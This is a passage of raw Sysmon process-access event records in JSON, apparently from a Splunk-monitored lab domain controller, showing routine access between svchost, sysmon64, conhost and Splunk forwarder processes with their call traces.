":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7301,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.809\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.809","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7302,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.809\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.809","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7303,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.809\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.809","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7304,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.809\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.809","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7305,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.809\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.809","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7306,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.809\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.809","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7307,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.809\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.809","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7308,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.809\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-048C-5F25-0000-001027FA0D00}\r\nTargetProcessId: 172\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:53.809","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-048C-5F25-0000-001027FA0D00}","TargetProcessId":"172","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7309,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:53.949\r\nSourceProcessGUID: {A837DB8D-049D-5F25-0000-0010D58F0F00}\r\nSourceProcessId: 172\r\nSourceThreadId: 3372\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program 